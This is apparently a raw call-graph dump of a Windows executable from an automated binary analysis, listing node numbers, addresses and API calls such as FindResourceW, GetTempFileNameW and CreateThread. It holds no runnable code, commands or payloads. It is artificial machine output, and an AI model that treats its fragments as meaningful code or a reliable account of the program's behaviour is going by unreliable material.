7591->7590 7592 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7592->7596 7593 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7593->7601 7596->7570 7596->7573 7596->7575 7596->7592 7596->7601 7597 4042b0 7600 40e020 4 API calls 7597->7600 7598 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7598->7620 7599 405dc0 3 API calls 7599->7612 7602 4042b8 7600->7602 7601->7576 7601->7581 7601->7584 7601->7593 7601->7606 7605 40e020 4 API calls 7602->7605 7603 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7603->7606 7604 405dc0 3 API calls 7607 40421f 7604->7607 7608 4042c2 7605->7608 7606->7577 7606->7582 7606->7585 7606->7603 7606->7611 7607->7589 7607->7604 7618 40de80 GetLastError TlsGetValue SetLastError 7607->7618 7624 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7607->7624 7627 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7607->7627 7610 40dec0 3 API calls 7608->7610 7609 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7609->7611 7613 4042ce 7610->7613 7611->7578 7611->7586 7611->7609 7615 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7611->7615 7611->7620 7612->7587 7612->7599 7612->7607 7617 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7612->7617 7623 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7612->7623 8190 40de80 GetLastError TlsGetValue SetLastError 7613->8190 7615->7611 7616 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7616->7620 7617->7612 7618->7607 7619 4042d4 8191 403275 7619->8191 7620->7579 7620->7598 7620->7612 7620->7616 8186 405dc0 7620->8186 7623->7612 7624->7607 7625 40dec0 3 API calls 7626 4042ed 7625->7626 7628 40985e 17 API calls 7626->7628 7627->7607 7629 4042f2 GetModuleHandleW 7628->7629 8284 40de80 GetLastError TlsGetValue SetLastError 7629->8284 7631 40430b 8285 40de80 GetLastError TlsGetValue SetLastError 7631->8285 7633 404313 8286 40de80 GetLastError TlsGetValue SetLastError 7633->8286 7635 40431b 8287 40de80 GetLastError TlsGetValue SetLastError 7635->8287 7637 404323 7638 40d100 8 API calls 7637->7638 7639 404335 7638->7639 8288 405182 TlsGetValue 7639->8288 7641 40433a 7642 405eb0 6 API calls 7641->7642 7643 404342 7642->7643 7644 40dec0 3 API calls 7643->7644 7645 40434c 7644->7645 8289 40de80 GetLastError TlsGetValue SetLastError 7645->8289 7647 404352 8290 40de80 GetLastError TlsGetValue SetLastError 7647->8290 7649 40435a 8291 40de80 GetLastError TlsGetValue SetLastError 7649->8291 7651 404362 8292 40de80 GetLastError TlsGetValue SetLastError 7651->8292 7653 40436a 7654 40d100 8 API calls 7653->7654 7655 40437a 7654->7655 8293 405182 TlsGetValue 7655->8293 7657 40437f 7658 405eb0 6 API calls 7657->7658 7659 404387 7658->7659 7660 40dec0 3 API calls 7659->7660 7661 404391 7660->7661 8294 402e9d 7661->8294 7665 4043a4 8311 4021a4 7665->8311 7668 4051a0 3 API calls 7669 4043b4 7668->7669 8427 40195b 7669->8427 7675 4043c8 8518 40358d 7675->8518 7678 40dec0 3 API calls 7679 4043ee PathRemoveBackslashW 7678->7679 7680 404402 7679->7680 8646 40de80 GetLastError TlsGetValue SetLastError 7680->8646 7682 404408 8647 40de80 GetLastError TlsGetValue SetLastError 7682->8647 7684 404410 8648 402bfa 7684->8648 7688 404422 8678 405182 TlsGetValue 7688->8678 7690 40442b 8679 4098c0 7690->8679 7693 4051a0 3 API calls 7694 404439 7693->7694 8683 40de80 GetLastError TlsGetValue SetLastError 7694->8683 7696 404445 7697 40e020 4 API calls 7696->7697 7698 40444d 7697->7698 7699 40e020 4 API calls 7698->7699 7700 404459 7699->7700 7701 40dec0 3 API calls 7700->7701 7702 404465 7701->7702 8684 40de80 GetLastError TlsGetValue SetLastError 7702->8684 7704 40446b 8685 401e55 7704->8685 7707 40dec0 3 API calls 7708 404480 7707->7708 8731 403855 7708->8731 7712 404491 7713 40e020 4 API calls 7712->7713 7714 404499 7713->7714 7715 40dec0 3 API calls 7714->7715 7716 4044a3 PathQuoteSpacesW 7715->7716 8925 40de80 GetLastError TlsGetValue SetLastError 7716->8925 7718 4044b6 7719 40e020 4 API calls 7718->7719 7720 4044be 7719->7720 7721 40e020 4 API calls 7720->7721 7722 4044c9 7721->7722 7723 40e020 4 API calls 7722->7723 7724 4044d3 7723->7724 7725 40dec0 3 API calls 7724->7725 7726 4044dd PathQuoteSpacesW 7725->7726 7727 4044f1 7726->7727 7728 404509 7726->7728 8978 405492 CreateThread 7727->8978 8988 402ca9 7728->8988 7731 404512 8926 40de80 GetLastError TlsGetValue SetLastError 7731->8926 7734 404518 7793 40dfc0 21 API calls 7792->7793 7794 40300e 7793->7794 10167 40de80 GetLastError TlsGetValue SetLastError 7794->10167 7796 403014 10168 40de80 GetLastError TlsGetValue SetLastError 7796->10168 7798 40301c 10169 40de80 GetLastError TlsGetValue SetLastError 7798->10169 7800 403024 10170 40de80 GetLastError TlsGetValue SetLastError 7800->10170 7802 40302c 7803 40d100 8 API calls 7802->7803 7804 40303e 7803->7804 10171 405182 TlsGetValue 7804->10171 7806 403043 7807 405eb0 6 API calls 7806->7807 7808 40304b 7807->7808 7809 40dec0 3 API calls 7808->7809 7810 403055 7809->7810 10172 40de80 GetLastError TlsGetValue SetLastError 7810->10172 7812 40305b 10173 40de80 GetLastError TlsGetValue SetLastError 7812->10173 7814 403063 10174 40de80 GetLastError TlsGetValue SetLastError 7814->10174 7816 40306b 10175 40de80 GetLastError TlsGetValue SetLastError 7816->10175 7818 403073 7819 40d100 8 API calls 7818->7819 7820 403083 7819->7820 10176 405182 TlsGetValue 7820->10176 7822 403088 7823 405eb0 6 API calls 7822->7823 7824 403090 7823->7824 7825 40dec0 3 API calls 7824->7825 7826 40309a 7825->7826 7827 402e9d 35 API calls 7826->7827 7828 4030a2 7827->7828 10177 40de80 GetLastError TlsGetValue SetLastError 7828->10177 7830 4030ac 7831 4021a4 122 API calls 7830->7831 7832 4030b7 7831->7832 7833 4051a0 3 API calls 7832->7833 7834 4030bc 7833->7834 10178 40de80 GetLastError TlsGetValue SetLastError 7834->10178 7836 4030c2 10179 40de80 GetLastError TlsGetValue SetLastError 7836->10179 7838 4030ca 7839 409355 33 API calls 7838->7839 7840 4030dd 7839->7840 7841 40dec0 3 API calls 7840->7841 7842 4030e7 7841->7842 7843 40323e 7842->7843 10180 40de80 GetLastError TlsGetValue SetLastError 7842->10180 7843->7843 7845 4030fe 10181 40de80 GetLastError TlsGetValue SetLastError 7845->10181 7847 403106 10182 40de80 GetLastError TlsGetValue SetLastError 7847->10182 7849 40310e 10183 40de80 GetLastError TlsGetValue SetLastError 7849->10183 7851 403116 7852 40d100 8 API calls 7851->7852 7853 403128 7852->7853 10184 405182 TlsGetValue 7853->10184 7855 40312d 7856 405eb0 6 API calls 7855->7856 7857 403135 7856->7857 7858 40dec0 3 API calls 7857->7858 7859 40313f 7858->7859 10185 40de80 GetLastError TlsGetValue SetLastError 7859->10185 7861 403145 10186 40de80 GetLastError TlsGetValue SetLastError 7861->10186 7863 40314d 10187 40de80 GetLastError TlsGetValue SetLastError 7863->10187 7865 403155 10188 40de80 GetLastError TlsGetValue SetLastError 7865->10188 7867 40315d 7868 40d100 8 API calls 7867->7868 7869 40316f 7868->7869 10189 405182 TlsGetValue 7869->10189 7871 403174 7872 405eb0 6 API calls 7871->7872 7873 40317c 7872->7873 7874 40dec0 3 API calls 7873->7874 7875 403186 7874->7875 10190 40de80 GetLastError TlsGetValue SetLastError 7875->10190 7877 40318c 7878 403cd7 84 API calls 7877->7878 7879 40319c 7878->7879 7880 40dec0 3 API calls 7879->7880 7881 4031a8 7880->7881 10191 40de80 GetLastError TlsGetValue SetLastError 7881->10191 7883 4031ae 7884 403cd7 84 API calls 7883->7884 7885 4031be 7884->7885 7886 40dec0 3 API calls 7885->7886 7887 4031c8 PathAddBackslashW 7886->7887 10192 40de80 GetLastError TlsGetValue SetLastError 7887->10192 7889 4031d7 10193 40de80 GetLastError TlsGetValue SetLastError 7889->10193 7891 4031e7 7892 40e020 4 API calls 7891->7892 7893 4031ef 7892->7893 7894 40e020 4 API calls 7893->7894 7895 4031fb 7894->7895 10194 405182 TlsGetValue 7895->10194 7897 403200 7898 40240c 34 API calls 7897->7898 7899 403208 7898->7899 7900 4051a0 3 API calls 7899->7900 7901 40320d 7900->7901 10195 40de80 GetLastError TlsGetValue SetLastError 7901->10195 7903 403217 7904 40e020 4 API calls 7903->7904 7905 40321f 7904->7905 7906 40dec0 3 API calls 7905->7906 7907 40322b PathRemoveBackslashW 7906->7907 7908 402ca9 141 API calls 7907->7908 7908->7843 7909->7377 7910->7380 7912 40d362 7911->7912 7913 40d3a0 TlsGetValue HeapReAlloc TlsSetValue 7912->7913 7914 40d378 TlsAlloc HeapAlloc TlsSetValue 7912->7914 7915 40d3e0 7913->7915 7916 40d3dc 7913->7916 7914->7913 7921 40db72 HeapAlloc 7915->7921 7916->7915 7917 409674 7916->7917 7920 40d52c HeapAlloc HeapAlloc InitializeCriticalSection 7917->7920 7920->7386 7922 40d3ec 7921->7922 7922->7917 7924 40e141 wcslen 7923->7924 7925 40e1ad 7923->7925 7927 40e176 HeapReAlloc 7924->7927 7928 40e158 HeapAlloc 7924->7928 7926 40e1b5 HeapFree 7925->7926 7929 40e198 7925->7929 7926->7929 7927->7929 7928->7929 7929->7391 7931 409def HeapAlloc 7930->7931 7932 409ed8 7930->7932 7931->7395 7931->7396 7956 40a11a 7932->7956 7934 409ee0 7963 40d946 7934->7963 7937 409f23 HeapFree 7937->7931 7938 409f0f 7939 409f10 HeapFree 7938->7939 7939->7939 7940 409f22 7939->7940 7940->7937 7942 40d83a 7941->7942 7943 40d8f2 RtlAllocateHeap 7942->7943 7944 40d846 7942->7944 7946 40d907 7943->7946 7947 409e76 HeapAlloc 7943->7947 8000 40da43 LoadLibraryW 7944->8000 7946->7947 7949 40d930 InitializeCriticalSection 7946->7949 7947->7400 7949->7947 7950 40d887 HeapAlloc 7952 40d8e5 LeaveCriticalSection 7950->7952 7953 40d89d 7950->7953 7951 40d86b 7951->7950 7951->7952 7952->7947 7954 40d819 6 API calls 7953->7954 7955 40d8b4 7954->7955 7955->7952 7960 40a12e 7956->7960 7957 40a177 memset 7959 40a190 7957->7959 7958 40a139 HeapFree 7958->7960 7959->7934 7960->7957 7960->7958 7976 411d8a 7960->7976 7981 40d74b 7960->7981 7964 40d953 EnterCriticalSection 7963->7964 7965 40d9b8 7963->7965 7966 40d9ae LeaveCriticalSection 7964->7966 7967 40d96f 7964->7967 7991 40d6dd 7965->7991 7970 409ee8 HeapFree HeapFree 7966->7970 7969 40d946 4 API calls 7967->7969 7974 40d979 HeapFree 7969->7974 7970->7937 7970->7938 7972 40d9c4 DeleteCriticalSection 7973 40d9ce HeapFree 7972->7973 7973->7970 7974->7966 7977 411e85 7976->7977 7978 411da2 7976->7978 7977->7960 7978->7977 7980 411d8a HeapFree 7978->7980 7988 40df50 7978->7988 7980->7978 7982 40d758 EnterCriticalSection 7981->7982 7985 40d762 7981->7985 7982->7985 7983 40d814 7983->7960 7984 40d80a LeaveCriticalSection 7984->7983 7986 40d7cb 7985->7986 7987 40d7b5 HeapFree 7985->7987 7986->7983 7986->7984 7987->7986 7989 40df5b HeapFree 7988->7989 7990 40df6e 7988->7990 7989->7990 7990->7978 7992 40d6f5 7991->7992 7993 40d6eb EnterCriticalSection 7991->7993 7994 40d712 7992->7994 7995 40d6fc HeapFree 7992->7995 7993->7992 7996 40d718 HeapFree 7994->7996 7997 40d72e 7994->7997 7995->7994 7995->7995 7996->7996 7996->7997 7998 40d745 7997->7998 7999 40d73b LeaveCriticalSection 7997->7999 7998->7972 7998->7973 7999->7998 8001 40da60 GetProcAddress 8000->8001 8002 40da8b InterlockedCompareExchange 8000->8002 8005 40da80 FreeLibrary 8001->8005 8006 40da70 8001->8006 8003 40da9b 8002->8003 8004 40daaf InterlockedExchange 8002->8004 8007 40d855 EnterCriticalSection 8003->8007 8009 40daa0 Sleep 8003->8009 8004->8007 8005->8002 8005->8007 8006->8005 8007->7951 8009->8003 8011 40a4c6 8010->8011 8015 40a4a7 8010->8015 8012 40a3eb 8011->8012 8013 40d74b 3 API calls 8011->8013 8012->7409 8013->8011 8014 411d8a HeapFree 8014->8015 8015->8012 8015->8014 8016 40d74b 3 API calls 8015->8016 8016->8015 8018 40dbdb 8017->8018 8020 40dd26 8017->8020 8018->7423 8018->7425 8019 40dd51 HeapFree 8019->8018 8020->8019 8021 40dd4f 8020->8021 8022 411d8a HeapFree 8020->8022 8021->8019 8022->8020 8024 40dfea TlsGetValue 8023->8024 8025 40dfcc 8023->8025 8027 402f4d 8024->8027 8028 40dffb 8024->8028 8026 40de30 5 API calls 8025->8026 8029 40dfd1 TlsGetValue 8026->8029 8035 4051a0 8027->8035 8067 40e6a0 HeapAlloc HeapAlloc TlsSetValue 8028->8067 8058 412082 8029->8058 8032 40e000 TlsGetValue 8034 412082 13 API calls 8032->8034 8034->8027 8068 40e780 GetLastError TlsGetValue SetLastError 8035->8068 8037 4051ab 8037->7437 8038->7439 8039->7441 8040->7443 8041->7445 8044 40d12d 8042->8044 8069 40d220 8044->8069 8046 405182 TlsGetValue 8046->7449 8048 405ebd 8047->8048 8079 40e1e0 TlsGetValue 8048->8079 8051 40e260 3 API calls 8052 405ed1 8051->8052 8053 405edd 8052->8053 8081 40e370 TlsGetValue 8052->8081 8055 405f0d 8053->8055 8056 405f00 CharUpperW 8053->8056 8055->7451 8056->7451 8057->7453 8059 412092 TlsAlloc InitializeCriticalSection 8058->8059 8060 4120ae TlsGetValue 8058->8060 8059->8060 8061 4120c4 HeapAlloc 8060->8061 8062 41214b HeapAlloc 8060->8062 8063 40dfe8 8061->8063 8064 4120de EnterCriticalSection 8061->8064 8062->8063 8063->8027 8065 4120f0 7 API calls 8064->8065 8066 4120ee 8064->8066 8065->8062 8066->8065 8067->8032 8068->8037 8070 40d22c 8069->8070 8073 40e260 TlsGetValue 8070->8073 8074 40e27b 8073->8074 8075 40e2a1 HeapReAlloc 8074->8075 8076 40e2d4 8074->8076 8077 402fd9 8075->8077 8076->8077 8078 40e2f0 HeapReAlloc 8076->8078 8077->8046 8078->8077 8080 405ec5 8079->8080 8080->8051 8081->8053 8082->7462 8083->7464 8084->7466 8086 40e260 3 API calls 8085->8086 8087 4096aa GetModuleFileNameW wcscmp 8086->8087 8088 4096e5 8087->8088 8089 4096cd memmove 8087->8089 8155 40e3f0 TlsGetValue 8088->8155 8089->8088 8091 401bc5 8092 405182 TlsGetValue 8091->8092 8092->7470 8093->7480 8094->7482 8095->7484 8096->7486 8097->7488 8098->7491 8100 405e1d 8099->8100 8101 40e1e0 TlsGetValue 8100->8101 8102 405e40 8101->8102 8103 40e260 3 API calls 8102->8103 8104 405e4c 8103->8104 8105 401ce9 8104->8105 8156 40e370 TlsGetValue 8104->8156 8107 405182 TlsGetValue 8105->8107 8107->7496 8157 40d080 8108->8157 8111 405182 TlsGetValue 8111->7500 8112->7506 8114 40e042 8113->8114 8115 40e033 wcslen 8113->8115 8116 40e260 3 API calls 8114->8116 8115->8114 8117 40e04d 8116->8117 8117->7508 8118->7512 8119->7514 8120->7516 8121->7518 8122->7522 8123->7528 8124->7530 8126 405f2e 8125->8126 8127 40e1e0 TlsGetValue 8126->8127 8128 405f4a 8127->8128 8129 40e260 3 API calls 8128->8129 8130 405f56 8129->8130 8132 405f62 8130->8132 8173 40e370 TlsGetValue 8130->8173 8132->7532 8174 40d2e8 TlsGetValue 8133->8174 8138 40de80 GetLastError TlsGetValue SetLastError 8138->7539 8139->7543 8141 40d2e8 16 API calls 8140->8141 8142 409885 8141->8142 8143 40973a 17 API calls 8142->8143 8144 409898 8143->8144 8145 40e260 3 API calls 8144->8145 8146 4098a6 8145->8146 8184 40e3f0 TlsGetValue 8146->8184 8148 401dc9 8149 40e080 TlsGetValue 8148->8149 8149->7551 8185 40e740 TlsGetValue 8150->8185 8152 40516a 8152->7557 8153->7559 8154->7561 8155->8091 8156->8105 8160 40d092 8157->8160 8158 40d0dd 8159 40d220 3 API calls 8158->8159 8161 401cf6 8159->8161 8160->8158 8162 40d0b2 8160->8162 8161->8111 8166 4121a0 8162->8166 8164 40d0b8 8172 412190 free 8164->8172 8167 412214 malloc 8166->8167 8168 4121ac WideCharToMultiByte 8166->8168 8167->8164 8168->8167 8170 4121e0 malloc 8168->8170 8170->8167 8171 4121f2 WideCharToMultiByte 8170->8171 8171->8164 8172->8158 8173->8132 8175 409869 8174->8175 8176 40d2fb HeapAlloc TlsSetValue 8174->8176 8180 40973a 8175->8180 8177 40d327 8176->8177 8178 412082 13 API calls 8177->8178 8179 40d348 8178->8179 8179->8175 8181 40d2e8 16 API calls 8180->8181 8182 40974b GetCommandLineW 8181->8182 8183 401dab 8182->8183 8183->7537 8183->8138 8184->8148 8185->8152 8187 40e260 3 API calls 8186->8187 8188 405dcb 8187->8188 8188->7620 8189->7597 8190->7619 8192 40327b 8191->8192 8192->8192 8193 40dfc0 21 API calls 8192->8193 8194 40328d 8193->8194 8195 4051a0 3 API calls 8194->8195 8196 403296 8195->8196 9053 405060 8196->9053 8199 405060 2 API calls 8200 4032af 8199->8200 9056 402bc1 8200->9056 8203 4032b8 9063 40559a GetVersionExW 8203->9063 8204 4032cb 8207 4032d5 8204->8207 8208 40343b 8204->8208 9069 40de80 GetLastError TlsGetValue SetLastError 8207->9069 9101 40de80 GetLastError TlsGetValue SetLastError 8208->9101 8211 403441 9102 40de80 GetLastError TlsGetValue SetLastError 8211->9102 8212 4032db 9070 40de80 GetLastError TlsGetValue SetLastError 8212->9070 8215 403449 8217 4062c0 3 API calls 8215->8217 8216 4032e3 9071 4062c0 8216->9071 8219 403455 8217->8219 8221 40dec0 3 API calls 8219->8221 8223 40345f GetSystemDirectoryW PathAddBackslashW 8221->8223 8222 40dec0 3 API calls 8224 4032f9 GetWindowsDirectoryW PathAddBackslashW 8222->8224 8226 403439 8223->8226 9074 40de80 GetLastError TlsGetValue SetLastError 8224->9074 9061 40de80 GetLastError TlsGetValue SetLastError 8226->9061 8227 40331a 8229 40e020 4 API calls 8227->8229 8231 403322 8229->8231 8230 403480 8232 40e020 4 API calls 8230->8232 8233 40e020 4 API calls 8231->8233 8234 403488 8232->8234 8236 40332d 8233->8236 9062 405170 TlsGetValue 8234->9062 8238 40dec0 3 API calls 8236->8238 8237 40348f 8240 40df50 HeapFree 8237->8240 8239 403337 PathAddBackslashW 8238->8239 9075 40de80 GetLastError TlsGetValue SetLastError 8239->9075 8242 4034a7 8240->8242 8244 40df50 HeapFree 8242->8244 8243 40334a 8245 40e020 4 API calls 8243->8245 8246 4034af 8244->8246 8247 403352 8245->8247 8248 40df50 HeapFree 8246->8248 8249 40e020 4 API calls 8247->8249 8250 4034b8 8248->8250 8251 40335c 8249->8251 8252 40df50 HeapFree 8250->8252 8253 40dec0 3 API calls 8251->8253 8254 4034c1 8252->8254 8255 403366 8253->8255 8257 40df50 HeapFree 8254->8257 9076 40de80 GetLastError TlsGetValue SetLastError 8255->9076 8259 4034ca 8257->8259 8258 403370 8260 40e020 4 API calls 8258->8260 8259->7625 8261 403378 8260->8261 8262 40e020 4 API calls 8261->8262 8263 403382 8262->8263 8264 40e020 4 API calls 8263->8264 8265 40338c 8264->8265 8266 40dec0 3 API calls 8265->8266 8267 403396 8266->8267 9077 40adc0 8267->9077 8269 4033a4 8270 4033ba 8269->8270 9087 40a9d0 8269->9087 8272 40adc0 11 API calls 8270->8272 8273 4033d2 8272->8273 8274 4033e8 8273->8274 8275 40a9d0 11 API calls 8273->8275 8274->8226 9099 40de80 GetLastError TlsGetValue SetLastError 8274->9099 8275->8274 8277 403404 9100 40de80 GetLastError TlsGetValue SetLastError 8277->9100 8279 40340c 8280 4062c0 3 API calls 8279->8280 8281 403418 8280->8281 8282 40dec0 3 API calls 8281->8282 8283 403422 GetSystemDirectoryW PathAddBackslashW 8282->8283 8283->8226 8284->7631 8285->7633 8286->7635 8287->7637 8288->7641 8289->7647 8290->7649 8291->7651 8292->7653 8293->7657 8295 40dfc0 21 API calls 8294->8295 8296 402eaa 8295->8296 8297 405060 2 API calls 8296->8297 8298 402eb6 FindResourceW 8297->8298 8299 402ed5 8298->8299 8306 402ef1 8298->8306 9157 4026b8 8299->9157 8303 402f00 9154 40e7c0 8303->9154 9151 409ba0 8306->9151 8308 40df50 HeapFree 8309 402f3b 8308->8309 8310 40de80 GetLastError TlsGetValue SetLastError 8309->8310 8310->7665 8312 40dfc0 21 API calls 8311->8312 8313 4021b0 8312->8313 8314 4051a0 3 API calls 8313->8314 8315 4021b9 8314->8315 8316 4021d2 8315->8316 8317 4023ba 8315->8317 9193 40de80 GetLastError TlsGetValue SetLastError 8316->9193 9191 40de80 GetLastError TlsGetValue SetLastError 8317->9191 8320 4021d8 9194 40de80 GetLastError TlsGetValue SetLastError 8320->9194 8321 4023c4 8323 40e020 4 API calls 8321->8323 8325 4023cc 8323->8325 8324 4021e0 9195 40de80 GetLastError TlsGetValue SetLastError 8324->9195 9192 405170 TlsGetValue 8325->9192 8328 4021e8 9196 40de80 GetLastError TlsGetValue SetLastError 8328->9196 8329 4023d3 8331 40df50 HeapFree 8329->8331 8333 4023eb 8331->8333 8332 4021f0 9197 409c10 8332->9197 8335 40df50 HeapFree 8333->8335 8337 4023f4 8335->8337 8336 402204 9206 405182 TlsGetValue 8336->9206 8339 40df50 HeapFree 8337->8339 8342 4023fc 8339->8342 8340 402209 9207 406060 8340->9207 8344 40df50 HeapFree 8342->8344 8346 402405 8344->8346 8345 40dec0 3 API calls 8347 40221b 8345->8347 8346->7668 9210 40de80 GetLastError TlsGetValue SetLastError 8347->9210 8349 402221 9211 40de80 GetLastError TlsGetValue SetLastError 8349->9211 8351 402229 9212 40de80 GetLastError TlsGetValue SetLastError 8351->9212 8353 402231 9213 40de80 GetLastError TlsGetValue SetLastError 8353->9213 8355 402239 8356 409c10 5 API calls 8355->8356 8357 402250 8356->8357 9214 405182 TlsGetValue 8357->9214 8359 402255 8360 406060 5 API calls 8359->8360 8361 40225d 8360->8361 8362 40dec0 3 API calls 8361->8362 8363 402267 8362->8363 9215 40de80 GetLastError TlsGetValue SetLastError 8363->9215 8365 40226d 9216 40de80 GetLastError TlsGetValue SetLastError 8365->9216 8367 402275 9217 40de80 GetLastError TlsGetValue SetLastError 8367->9217 8369 402288 9218 40de80 GetLastError TlsGetValue SetLastError 8369->9218 8371 402290 9219 4057f0 8371->9219 8373 4022a6 9235 40e080 TlsGetValue 8373->9235 8375 4022ab 9236 40de80 GetLastError TlsGetValue SetLastError 8375->9236 8377 4022b1 9237 40de80 GetLastError TlsGetValue SetLastError 8377->9237 8379 4022b9 8380 4057f0 9 API calls 8379->8380 8381 4022cf 8380->8381 9238 405182 TlsGetValue 8381->9238 8383 4022d4 9239 405182 TlsGetValue 8383->9239 8385 4022dc 9240 408f69 8385->9240 8388 40dec0 3 API calls 8389 4022ef 8388->8389 8390 4023b0 8389->8390 8391 402300 8389->8391 8393 401fa9 36 API calls 8390->8393 9282 40de80 GetLastError TlsGetValue SetLastError 8391->9282 8393->8317 8394 402306 9283 40de80 GetLastError TlsGetValue SetLastError 8394->9283 8396 40230e 9284 40de80 GetLastError TlsGetValue SetLastError 8396->9284 8398 40231b 9285 40de80 GetLastError TlsGetValue SetLastError 8398->9285 8400 402323 8401 406060 5 API calls 8400->8401 8402 40232e 8401->8402 9286 405182 TlsGetValue 8402->9286 8404 402333 8405 40d100 8 API calls 8404->8405 8406 40233b 8405->8406 8407 40dec0 3 API calls 8406->8407 8408 402345 8407->8408 8409 4023ae 8408->8409 9287 40de80 GetLastError TlsGetValue SetLastError 8408->9287 8409->8317 8411 40235b 9288 40de80 GetLastError TlsGetValue SetLastError 8411->9288 8413 402368 9289 40de80 GetLastError TlsGetValue SetLastError 8413->9289 8415 402370 8416 4057f0 9 API calls 8415->8416 8417 402386 8416->8417 9290 40e080 TlsGetValue 8417->9290 8419 40238b 9291 405182 TlsGetValue 8419->9291 8421 402396 9292 408e27 8421->9292 8424 4051a0 3 API calls 8425 4023a4 8424->8425 8426 401fa9 36 API calls 8425->8426 8426->8409 8428 40dfc0 21 API calls 8427->8428 8432 401969 8428->8432 8429 4019ea 8431 409ba0 RtlAllocateHeap 8429->8431 8430 40de80 GetLastError TlsGetValue SetLastError 8430->8432 8433 4019f4 8431->8433 8432->8429 8432->8430 8436 405dc0 3 API calls 8432->8436 8443 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8432->8443 8448 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8432->8448 9349 40de80 GetLastError TlsGetValue SetLastError 8433->9349 8435 4019fe 9350 40de80 GetLastError TlsGetValue SetLastError 8435->9350 8436->8432 8438 401a06 9351 40a756 8438->9351 8441 40dec0 3 API calls 8442 401a17 GetTempFileNameW 8441->8442 9360 40de80 GetLastError TlsGetValue SetLastError 8442->9360 8443->8432 8445 401a35 9361 40de80 GetLastError TlsGetValue SetLastError 8445->9361 8447 401a3d 8449 409bc0 4 API calls 8447->8449 8448->8432 8450 401a48 8449->8450 8451 40dec0 3 API calls 8450->8451 8452 401a54 8451->8452 9362 40a7e7 8452->9362 8458 401a8a 9371 40de80 GetLastError TlsGetValue SetLastError 8458->9371 8460 401a92 8461 409bc0 4 API calls 8460->8461 8462 401a9d 8461->8462 8463 40dec0 3 API calls 8462->8463 8464 401aa9 8463->8464 8465 40a7e7 2 API calls 8464->8465 8466 401ab4 8465->8466 8467 40a6c5 3 API calls 8466->8467 8468 401abf GetTempFileNameW PathAddBackslashW 8467->8468 9372 40de80 GetLastError TlsGetValue SetLastError 8468->9372 8470 401aea 9373 40de80 GetLastError TlsGetValue SetLastError 8470->9373 8472 401af2 8473 409bc0 4 API calls 8472->8473 8474 401afd 8473->8474 8475 40dec0 3 API calls 8474->8475 8476 401b09 8475->8476 8477 40a7e7 2 API calls 8476->8477 8478 401b14 PathRenameExtensionW GetTempFileNameW 8477->8478 9374 40de80 GetLastError TlsGetValue SetLastError 8478->9374 8480 401b43 9375 40de80 GetLastError TlsGetValue SetLastError 8480->9375 8482 401b4b 8483 409bc0 4 API calls 8482->8483 8484 401b56 8483->8484 8485 40dec0 3 API calls 8484->8485 8486 401b62 8485->8486 9376 409b80 HeapFree 8486->9376 8488 401b6b 8489 40df50 HeapFree 8488->8489 8490 401b78 8489->8490 8491 40df50 HeapFree 8490->8491 8492 401b81 8491->8492 8493 40df50 HeapFree 8492->8493 8494 401b8a 8493->8494 8495 40460e 8494->8495 8496 40dfc0 21 API calls 8495->8496 8500 40461b 8496->8500 8497 40469c 9383 40de80 GetLastError TlsGetValue SetLastError 8497->9383 8498 40de80 GetLastError TlsGetValue SetLastError 8498->8500 8500->8497 8500->8498 8502 405dc0 3 API calls 8500->8502 8511 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8500->8511 8514 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8500->8514 8501 4046a2 8503 40358d 98 API calls 8501->8503 8502->8500 8504 4046b8 8503->8504 8505 40dec0 3 API calls 8504->8505 8506 4046c2 8505->8506 9384 40a95a 8506->9384 8509 40df50 HeapFree 8510 4046d6 8509->8510 8512 40df50 HeapFree 8510->8512 8511->8500 8513 4046df 8512->8513 8515 40df50 HeapFree 8513->8515 8514->8500 8516 4043c2 8515->8516 8517 40de80 GetLastError TlsGetValue SetLastError 8516->8517 8517->7675 8519 40dfc0 21 API calls 8518->8519 8520 403597 8519->8520 8521 4051a0 3 API calls 8520->8521 8522 4035a0 8521->8522 8523 405060 2 API calls 8522->8523 8524 4035ac 8523->8524 8525 4035b7 8524->8525 8526 4035db 8524->8526 9389 40de80 GetLastError TlsGetValue SetLastError 8525->9389 8527 4035e5 8526->8527 8528 403608 8526->8528 9391 40de80 GetLastError TlsGetValue SetLastError 8527->9391 8531 403612 8528->8531 8532 40363b 8528->8532 9392 40de80 GetLastError TlsGetValue SetLastError 8531->9392 8535 403645 8532->8535 8536 40366e 8532->8536 8533 4035bd 9390 40de80 GetLastError TlsGetValue SetLastError 8533->9390 8534 4035f1 8541 40e020 4 API calls 8534->8541 9410 40de80 GetLastError TlsGetValue SetLastError 8535->9410 8539 4036a1 8536->8539 8540 403678 8536->8540 8548 4036d4 8539->8548 8549 4036ab 8539->8549 9412 40de80 GetLastError TlsGetValue SetLastError 8540->9412 8546 4035f9 8541->8546 8543 403618 9393 40de80 GetLastError TlsGetValue SetLastError 8543->9393 8544 4035c5 8551 40a7f5 5 API calls 8544->8551 8557 40dec0 3 API calls 8546->8557 8547 40364b 9411 40de80 GetLastError TlsGetValue SetLastError 8547->9411 8555 403707 8548->8555 8556 4036de 8548->8556 9414 40de80 GetLastError TlsGetValue SetLastError 8549->9414 8553 4035cc 8551->8553 8552 403620 9394 40a83a 8552->9394 8561 40dec0 3 API calls 8553->8561 8554 40367e 9413 40de80 GetLastError TlsGetValue SetLastError 8554->9413 8567 403711 8555->8567 8568 40373a 8555->8568 9416 40de80 GetLastError TlsGetValue SetLastError 8556->9416 8564 4035d6 8557->8564 8561->8564 9387 40de80 GetLastError TlsGetValue SetLastError 8564->9387 8565 403653 8574 40a83a 17 API calls 8565->8574 8566 4036b1 9415 40de80 GetLastError TlsGetValue SetLastError 8566->9415 9418 40de80 GetLastError TlsGetValue SetLastError 8567->9418 8572 403744 8568->8572 8573 40376d 8568->8573 8570 403686 8581 40a83a 17 API calls 8570->8581 